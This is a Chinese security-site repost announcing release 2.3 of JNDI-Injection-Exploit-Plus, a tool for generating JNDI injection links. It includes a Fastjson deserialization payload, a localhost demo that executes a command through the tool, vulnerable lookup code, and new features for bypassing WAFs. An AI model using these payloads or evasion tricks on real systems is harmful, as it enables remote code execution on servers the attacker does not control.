JNDI-Injection-Exploit-Plus v2.3 发布:融合字节中以绕过WAF,删除敏感信息以绕过 WAF

admin 2024年3月4日15:35:28评论20 views字数 1116阅读3分43秒阅读模式

JNDI-Injection-Exploit-Plus v2.3 发布:融合字节中以绕过WAF,删除敏感信息以绕过 WAF

描述

JNDI-Injection-Exploit-Plus是一个用于生成可行的JNDI链接并通过启动RMI服务器、LDAP服务器和HTTP服务器提供后台服务的工具。使用这个工具可以让你获得JNDI链接,你可以将这些链接插入到你的POC中来测试漏洞。

JNDI-Injection-Exploit-Plus-2.3此次更新内容:

1.新功能:新标志“-F”将类名融合在字节中以绕过WAF。

2.删除敏感信息以绕过 WAF。

例如,这是一个 Fastjson vul-poc:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

我们可以将“rmi://127.0.0.1:1099/Object”替换为JNDI-Injection-Exploit-Plus生成的链接来测试漏洞。

此外,您还可以使用 JNDI-Injection-Exploit-Plus 生成base64/hex 类型的有效负载,如ysoserial

不仅仅是JNDI 注入利用

JNDI-Injection-Exploit是一个很棒的工具,这是它的增强版。

例子-JNDI 链接

1.本地演示,像这样启动该工具:

$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

JNDI-Injection-Exploit-Plus v2.3 发布:融合字节中以绕过WAF,删除敏感信息以绕过 WAF

2.假设我们将步骤 1 中生成的 rmi://ADDRESS/remoteExploit8 等 JNDI 链接注入到可能受到 JNDI 注入攻击的易受攻击的应用程序中。

在这个例子中,它看起来像这样:

class Test{    public static void main(String[] args) throws Exception{        InitialContext ctx = new InitialContext();        ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8");    }}

然后当我们运行这段代码时,命令将被执行,

日志将在 shell 中打印:

JNDI-Injection-Exploit-Plus v2.3 发布:融合字节中以绕过WAF,删除敏感信息以绕过 WAF

项目地址:
https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/releases/tag/2.3

原文始发于微信公众号(Ots安全):JNDI-Injection-Exploit-Plus v2.3 发布:融合字节中以绕过WAF,删除敏感信息以绕过 WAF

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月4日15:35:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JNDI-Injection-Exploit-Plus v2.3 发布:融合字节中以绕过WAF,删除敏感信息以绕过 WAFhttps://cn-sec.com/archives/2544903.html

发表评论

匿名网友 填写信息